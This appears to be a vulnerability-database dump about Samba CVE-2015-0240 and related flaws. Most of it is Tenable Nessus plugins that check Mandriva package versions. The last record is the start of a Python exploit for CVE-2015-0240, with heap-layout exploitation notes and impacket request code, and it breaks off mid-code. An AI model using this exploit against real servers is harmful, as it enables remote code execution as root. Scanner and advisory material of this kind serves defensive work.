value:\"p-cpe:/a:mandriva:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba4-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-dc0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-smbclient-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-smbclient0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-test-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-test0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-wbclient-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-wbclient0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba41-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python-samba4-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", 
reference:\"samba4-client-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-common-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-dc-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"samba4-pidl-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-test-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-vfs-glusterfs-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-clients-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-krb5-locator-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-modules-4.1.17-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Updated samba packages fix security vulnerabilities :\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). 
A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-081.NASL", "href": "https://www.tenable.com/plugins/nessus/82334", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2015:081)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:081. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82334);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"MDVSA\", value:\"2015:081\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2015:081)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages fix security vulnerabilities :\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). 
A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-fsecure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-sophos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ 
\"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64netapi0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nss_wins-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-client-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-common-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"samba-doc-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-server-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-swat-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-clamav-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", 
cpu:\"x86_64\", reference:\"samba-virusfilter-fsecure-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-sophos-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-winbind-3.6.25-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Updated samba packages fix security vulnerabilities :\n\nIn Samba before 3.6.23, the SAMR server neglects to ensure that\nattempted password changes will update the bad password count, and\ndoes not set the lockout flags. This would allow a user unlimited\nattempts against the password by simply calling ChangePasswordUser2\nrepeatedly. This is available without any other authentication\n(CVE-2013-4496).\n\nInformation leak vulnerability in the VFS code, allowing an\nauthenticated user to retrieve eight bytes of uninitialized memory\nwhen shadow copy is enabled (CVE-2014-0178).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are vulnerable to a\ndenial of service on the nmbd NetBIOS name services daemon. A\nmalformed packet can cause the nmbd server to loop the CPU and prevent\nany further NetBIOS ame service (CVE-2014-0244).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are affected by a\ndenial of service crash involving overwriting memory on an\nauthenticated connection to the smbd file server (CVE-2014-3493).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). 
A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-082.NASL", "href": "https://www.tenable.com/plugins/nessus/82335", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2015:082)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:082. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82335);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2013-4496\", \"CVE-2014-0178\", \"CVE-2014-0244\", \"CVE-2014-3493\", \"CVE-2015-0240\");\n script_xref(name:\"MDVSA\", value:\"2015:082\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2015:082)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages fix security vulnerabilities :\n\nIn Samba before 3.6.23, the SAMR server neglects to ensure that\nattempted password changes will update the bad password count, and\ndoes not set the lockout flags. This would allow a user unlimited\nattempts against the password by simply calling ChangePasswordUser2\nrepeatedly. 
This is available without any other authentication\n(CVE-2013-4496).\n\nInformation leak vulnerability in the VFS code, allowing an\nauthenticated user to retrieve eight bytes of uninitialized memory\nwhen shadow copy is enabled (CVE-2014-0178).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are vulnerable to a\ndenial of service on the nmbd NetBIOS name services daemon. A\nmalformed packet can cause the nmbd server to loop the CPU and prevent\nany further NetBIOS ame service (CVE-2014-0244).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are affected by a\ndenial of service crash involving overwriting memory on an\nauthenticated connection to the smbd file server (CVE-2014-3493).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0138.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0279.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-fsecure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-sophos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64netapi0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.6.25-1.mbs2\")) flag++;\nif 
(rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"nss_wins-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-client-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-common-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"samba-doc-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-server-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-swat-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-virusfilter-clamav-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-virusfilter-fsecure-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-virusfilter-sophos-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-winbind-3.6.25-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-13T16:16:03", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2015-04-15T00:00:00", "published": "2015-04-15T00:00:00", "id": "1337DAY-ID-23513", "href": "https://0day.today/exploit/description/23513", "type": "zdt", "title": "Samba < 3.6.2 x86 - PoC", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nExploit for Samba vulnerabilty (CVE-2015-0240) by sleepya\r\n \r\nThe exploit only targets 
vulnerable x86 smbd <3.6.24 which 'creds' is controlled by\r\nReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'\r\nin libtalloc does not write a value on 'creds' address.\r\n \r\nReference:\r\n- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/\r\n \r\nNote:\r\n- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)\r\n if something failed\r\n \r\nFind heap address:\r\n- ubuntu PIE heap start range: b7700000 - b9800000\r\n- start payload size: the bigger it is the lesser connection and binding time.\r\n but need more time to shrink payload size\r\n- payload is too big to fit in freed small hole. so payload is always at end\r\n of heap\r\n- start bruteforcing heap address from high memory address to low memory address\r\n to prevent 'creds' pointed to real heap chunk (also no crash but not our payload)\r\n \r\nLeak info:\r\n- heap layout is predictable because talloc_stackframe_pool(8192) is called after\r\n accepted connection and fork but before calling smbd_server_connection_loop_once()\r\n- before talloc_stackframe_pool(8192) is called, there are many holes in heap\r\n but their size are <8K. so pool is at the end of heap at this time\r\n- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool.\r\n with the same pattern of request, the layout in pool are always the same.\r\n- many data are not allocated in pool but fit in free holes. so no small size data are\r\n allocated after pool.\r\n- normally there are only few data block allocated after pool.\r\n - pool size: 0x2048 (included glibc heap header 4 bytes)\r\n - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes)\r\n - p->in_data.pdu.data. 
the size is 0x10e8 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - all fragment should be same size to prevent talloc_realloc() changed pdu.data size\r\n - so last fragment should be padded\r\n - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - p->in_data.data.data. the size is our netlogon data\r\n - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes)\r\n - this data is allocated by realloc(), grew by each fragment. so this memory\r\n block is not allocated by mmapped even the size is very big.\r\n- pool layout for interested data\r\n - r->out offset from pool (talloc header) is 0x13c0\r\n - r->out.return_authenticator offset from pool is 0x13c0+0x18\r\n - overwrite this (with link unlink) to leak info in ServerPasswordSet response\r\n - smb_request offset from pool (talloc header) is 0x11a0\r\n - smb_request.sconn offset from pool is 0x11a0+0x3c\r\n - socket fd is at smb_request.sconn address (first struct member)\r\n- more shared folder in configuration, more freed heap holes\r\n - only if there is no or one shared, many data might be unexpected allocated after pool.\r\n have to get that extra offset or bruteforce it\r\n \r\n \r\nMore exploitation detail in code (comment) ;)\r\n\"\"\"\r\n \r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n \r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n \r\n \r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. 
help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n \r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n \r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n \r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n 